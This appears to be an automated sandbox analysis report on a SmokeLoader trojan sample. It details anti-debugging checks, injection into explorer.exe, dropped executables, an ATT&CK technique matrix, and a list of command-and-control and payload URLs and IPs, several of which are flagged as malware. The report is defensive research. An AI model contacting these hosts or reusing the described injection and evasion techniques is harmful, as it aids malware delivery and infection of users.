      Source: C:\Users\user\AppData\Local\Temp\AA31.exeAPI call chain: ExitProcess graph end nodegraph_7-4302
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeAPI call chain: ExitProcess graph end nodegraph_7-4555
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeAPI call chain: ExitProcess graph end nodegraph_7-4161
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeAPI call chain: ExitProcess graph end nodegraph_7-4331
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeAPI call chain: ExitProcess graph end nodegraph_7-4359
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeAPI call chain: ExitProcess graph end nodegraph_7-4340
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeAPI call chain: ExitProcess graph end nodegraph_7-4550
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeAPI call chain: ExitProcess graph end nodegraph_7-4477
      Source: C:\Windows\explorer.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Roaming\ashcvvsProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 9_2_00401006 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00401006
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 9_2_00407585 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,9_2_00407585
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeCode function: 0_2_005D092B mov eax, dword ptr fs:[00000030h]0_2_005D092B
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeCode function: 0_2_005D0D90 mov eax, dword ptr fs:[00000030h]0_2_005D0D90
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeCode function: 0_2_0065E39D push dword ptr fs:[00000030h]0_2_0065E39D
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 5_2_006D092B mov eax, dword ptr fs:[00000030h]5_2_006D092B
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 5_2_006D0D90 mov eax, dword ptr fs:[00000030h]5_2_006D0D90
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 5_2_006FBCC5 push dword ptr fs:[00000030h]5_2_006FBCC5
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeCode function: 6_2_00007FF7DAD611AD _initterm,SetUnhandledExceptionFilter,6_2_00007FF7DAD611AD
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0310F8 Sleep,_initterm,_initterm,SetUnhandledExceptionFilter,7_2_00007FF65B0310F8
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 9_2_00404464 SetUnhandledExceptionFilter,9_2_00404464
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 9_2_0040946E __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_0040946E
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 9_2_00401006 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00401006
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 9_2_004024D6 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_004024D6

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\explorer.exeFile created: AA31.exe.1.drJump to dropped file
      Source: C:\Windows\explorer.exeNetwork Connect: 45.130.41.250 443Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 190.187.52.42 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 58.151.148.90 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 185.149.100.242 443Jump to behavior
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeThread created: C:\Windows\explorer.exe EIP: 11F19D0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\ashcvvsThread created: unknown EIP: 30319D0Jump to behavior
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: C:\Users\user\AppData\Roaming\ashcvvsSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\ashcvvsSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: explorer.exe, 00000001.00000000.1750648090.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1748334903.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1749250515.0000000004CE0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000001.00000000.1748334903.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000001.00000000.1748144238.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
      Source: explorer.exe, 00000001.00000000.1748334903.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: explorer.exe, 00000001.00000000.1748334903.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: GetLocaleInfoA,9_2_00409824
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeCode function: 0_2_0042379F GetLogicalDriveStringsW,DeleteVolumeMountPointW,GetCommandLineA,lstrcatW,InterlockedExchange,GetActiveWindow,GetSystemWindowsDirectoryW,WriteConsoleW,IntersectRect,FlushInstructionCache,GetAtomNameA,GlobalDeleteAtom,GetCurrentConsoleFont,SearchPathA,GetDefaultCommConfigA,DebugBreak,EnumDateFormatsW,SetCommMask,GetTickCount,GetSystemTimes,FoldStringW,OpenWaitableTimerA,HeapLock,FormatMessageW,GlobalAlloc,LoadLibraryA,0_2_0042379F
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000000.00000002.1768976686.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1769015337.0000000000611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2060983151.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2060932056.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000000.00000002.1768976686.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1769015337.0000000000611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2060983151.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2060932056.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
      Command and Scripting Interpreter
      1
      DLL Side-Loading
      32
      Process Injection
      11
      Masquerading
      OS Credential Dumping11
      System Time Discovery
      Remote Services1
      Archive Collected Data
      11
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Native API
      Boot or Logon Initialization Scripts1
      DLL Side-Loading
      2
      Virtualization/Sandbox Evasion
      LSASS Memory421
      Security Software Discovery
      Remote Desktop ProtocolData from Removable Media3
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      Exploitation for Client Execution
      Logon Script (Windows)Logon Script (Windows)32
      Process Injection
      Security Account Manager2
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared Drive4
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information
      NTDS3
      Process Discovery
      Distributed Component Object ModelInput Capture115
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Hidden Files and Directories
      LSA Secrets1
      Application Window Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
      Obfuscated Files or Information
      Cached Domain Credentials2
      File and Directory Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      Software Packing
      DCSync124
      System Information Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      DLL Side-Loading
      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
      File Deletion
      /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1488759 Sample: n72I7qB2ss.exe Startdate: 06/08/2024 Architecture: WINDOWS Score: 100 34 mzxn.ru 2->34 36 mussangroup.com 2->36 38 2 other IPs or domains 2->38 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 Antivirus detection for URL or domain 2->60 62 6 other signatures 2->62 8 n72I7qB2ss.exe 2->8         started        11 ashcvvs 2->11         started        13 ashcvvs 2->13         started        signatures3 process4 signatures5 66 Detected unpacking (changes PE section rights) 8->66 68 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->68 70 Maps a DLL or memory area into another process 8->70 78 3 other signatures 8->78 15 explorer.exe 56 7 8->15 injected 72 Antivirus detection for dropped file 11->72 74 Multi AV Scanner detection for dropped file 11->74 76 Machine Learning detection for dropped file 11->76 process6 dnsIp7 42 mussangroup.com 185.149.100.242, 443, 49754 VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLi Turkey 15->42 44 mzxn.ru 58.151.148.90, 49736, 49737, 49738 POWERVIS-AS-KRLGPOWERCOMMKR Korea Republic of 15->44 46 2 other IPs or domains 15->46 26 C:\Users\user\AppData\Roaming\ashcvvs, PE32 15->26 dropped 28 C:\Users\user\AppData\Local\Temp\AA31.exe, PE32+ 15->28 dropped 30 C:\Users\user\AppData\Local\Temp\70C1.exe, PE32+ 15->30 dropped 32 C:\Users\user\...\ashcvvs:Zone.Identifier, ASCII 15->32 dropped 48 System process connects to network (likely due to code injection or exploit) 15->48 50 Benign windows process drops PE files 15->50 52 Deletes itself after installation 15->52 54 Hides that the sample has been downloaded from the Internet (zone.identifier) 15->54 20 70C1.exe 15->20         started        24 AA31.exe 15->24         started        file8 signatures9 process10 dnsIp11 40 mundoparachicas.space 188.114.97.3, 443, 49757, 49758 CLOUDFLARENETUS European Union 20->40 64 Multi AV Scanner detection for dropped file 20->64 signatures12

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      n72I7qB2ss.exe71%ReversingLabsWin32.Trojan.SmokeLoader
      n72I7qB2ss.exe58%VirustotalBrowse
      n72I7qB2ss.exe100%AviraHEUR/AGEN.1318094
      n72I7qB2ss.exe100%Joe Sandbox ML
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Roaming\ashcvvs100%AviraHEUR/AGEN.1318094
      C:\Users\user\AppData\Roaming\ashcvvs100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\70C1.exe32%ReversingLabs
      C:\Users\user\AppData\Local\Temp\AA31.exe54%ReversingLabsWin32.Trojan.Generic
      C:\Users\user\AppData\Roaming\ashcvvs71%ReversingLabsWin32.Trojan.SmokeLoader
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://aka.ms/odirmr0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
      https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl0%URL Reputationsafe
      https://powerpoint.office.comcember0%URL Reputationsafe
      https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
      https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-0%URL Reputationsafe
      https://excel.office.com0%URL Reputationsafe
      http://schemas.micro0%URL Reputationsafe
      https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we0%URL Reputationsafe
      https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY0%URL Reputationsafe
      https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark0%URL Reputationsafe
      https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi0%URL Reputationsafe
      https://api.msn.com/q0%URL Reputationsafe
      https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc0%URL Reputationsafe
      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%URL Reputationsafe
      https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-10%URL Reputationsafe
      https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark0%URL Reputationsafe
      https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A0%URL Reputationsafe
      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg0%URL Reputationsafe
      https://wns.windows.com/L0%URL Reputationsafe
      https://word.office.com0%URL Reputationsafe
      https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu0%URL Reputationsafe
      https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent0%URL Reputationsafe
      https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win0%URL Reputationsafe
      https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
      https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-0%URL Reputationsafe
      https://aka.ms/Vh5j3k0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu0%URL Reputationsafe
      https://api.msn.com/v1/news/Feed/Windows?&0%URL Reputationsafe
      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark0%URL Reputationsafe
      https://www.rd.com/list/polite-habits-campers-dislike/0%URL Reputationsafe
      http://olinsw.ws/tmp/index.php0%Avira URL Cloudsafe
      http://100xmargin.com/tmp/index.php100%Avira URL Cloudmalware
      https://android.notify.windows.com/iOS0%URL Reputationsafe
      https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar0%URL Reputationsafe
      https://mundoparachicas.space/dnbcompany_lt1jns?r8nly8r5hpamvqwa=wPH3ORWQpCff0Rbkjeq7BHUXYUTSjq2ZvEO0%Avira URL Cloudsafe
      https://api.msn.com/0%URL Reputationsafe
      https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d0%URL Reputationsafe
      https://outlook.com_0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark0%URL Reputationsafe
      https://www.msn.com:443/en-us/feed0%URL Reputationsafe
      https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe0%URL Reputationsafe
      https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at0%URL Reputationsafe
      https://mundoparachicas.space/Lp_0%Avira URL Cloudsafe
      http://wgdnb4rc.xyz/tmp/index.php0%Avira URL Cloudsafe
      https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of0%URL Reputationsafe
      https://mundoparachicas.space/imageFolio.cgi?qehii0w3ze9sn=nO6wgakvlUvUKyvVvRezNJaB0mAvGbPqVKo12a3LOUvhvPrA9eFcs3uIBjr2ICTAiCiRSrnI1BD1Zngf6t0fTw%3D%3D0%Avira URL Cloudsafe
      https://mussangroup.com/wp-content/images/pic5.jpg100%Avira URL Cloudmalware
      http://mzxn.ru/tmp/index.php100%Avira URL Cloudmalware
      http://www.autoitscript.com/autoit3/J0%Avira URL Cloudsafe
      https://mundoparachicas.space/imageFolio.cgi?qehii0w3ze9sn=nO6wgakvlUvUKyvVvRezNJaB0mAvGbPqVKo12a3LO0%Avira URL Cloudsafe
      https://mundoparachicas.space/dnbcompany_lt1jns?r8nly8r5hpamvqwa=wPH3ORWQpCff0Rbkjeq7BHUXYUTSjq2ZvEO74fzamCqz4bPud6wNFWcNcvb5H2uEbiUuLc8s9wrJ4LD3%2BwxZ6g%3D%3D0%Avira URL Cloudsafe
      https://browserupdater.com/build.exe0%Avira URL Cloudsafe
      https://mundoparachicas.space/0%Avira URL Cloudsafe
      https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      browserupdater.com
      45.130.41.250
      truetrue
        unknown
        mzxn.ru
        58.151.148.90
        truetrue
          unknown
          mundoparachicas.space
          188.114.97.3
          truefalse
            unknown
            mussangroup.com
            185.149.100.242
            truetrue
              unknown
              NameMaliciousAntivirus DetectionReputation
              http://100xmargin.com/tmp/index.phptrue
              • Avira URL Cloud: malware
              unknown
              http://olinsw.ws/tmp/index.phptrue
              • Avira URL Cloud: safe
              unknown
              http://wgdnb4rc.xyz/tmp/index.phptrue
              • Avira URL Cloud: safe
              unknown
              https://mundoparachicas.space/imageFolio.cgi?qehii0w3ze9sn=nO6wgakvlUvUKyvVvRezNJaB0mAvGbPqVKo12a3LOUvhvPrA9eFcs3uIBjr2ICTAiCiRSrnI1BD1Zngf6t0fTw%3D%3Dfalse
              • Avira URL Cloud: safe
              unknown
              http://mzxn.ru/tmp/index.phptrue
              • Avira URL Cloud: malware
              unknown
              https://mussangroup.com/wp-content/images/pic5.jpgtrue
              • Avira URL Cloud: malware
              unknown
              https://mundoparachicas.space/dnbcompany_lt1jns?r8nly8r5hpamvqwa=wPH3ORWQpCff0Rbkjeq7BHUXYUTSjq2ZvEO74fzamCqz4bPud6wNFWcNcvb5H2uEbiUuLc8s9wrJ4LD3%2BwxZ6g%3D%3Dfalse
              • Avira URL Cloud: safe
              unknown
              https://browserupdater.com/build.exetrue
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://aka.ms/odirmrexplorer.exe, 00000001.00000000.1749370203.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://mundoparachicas.space/dnbcompany_lt1jns?r8nly8r5hpamvqwa=wPH3ORWQpCff0Rbkjeq7BHUXYUTSjq2ZvEO70C1.exe, 00000006.00000002.2416403433.000001CD0D46C000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000001.00000000.1749370203.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://powerpoint.office.comcemberexplorer.exe, 00000001.00000000.1758007071.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000001.00000000.1750648090.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://mundoparachicas.space/Lp_AA31.exe, 00000007.00000002.2486672501.00000253616AF000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://excel.office.comexplorer.exe, 00000001.00000000.1758007071.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://schemas.microexplorer.exe, 00000001.00000000.1749984821.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1751253415.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1750347122.0000000008720000.00000002.00000001.00040000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000001.00000000.1749370203.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://api.msn.com/qexplorer.exe, 00000001.00000000.1750648090.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000001.00000000.1758007071.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://mundoparachicas.space/imageFolio.cgi?qehii0w3ze9sn=nO6wgakvlUvUKyvVvRezNJaB0mAvGbPqVKo12a3LOAA31.exe, 00000007.00000002.2487346926.000002536186A000.00000004.00001000.00020000.00000000.sdmp, AA31.exe, 00000007.00000003.2475368432.00000253616C0000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2486877032.00000253616DF000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000001.00000000.1749370203.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000001.00000000.1749370203.00000000079B1000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://wns.windows.com/Lexplorer.exe, 00000001.00000000.1758007071.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://word.office.comexplorer.exe, 00000001.00000000.1758007071.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000001.00000000.1749370203.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://aka.ms/Vh5j3kexplorer.exe, 00000001.00000000.1749370203.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://mundoparachicas.space/70C1.exe, 00000006.00000002.2415753846.000001CD0D25D000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://api.msn.com/v1/news/Feed/Windows?&explorer.exe, 00000001.00000000.1750648090.00000000096DF000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
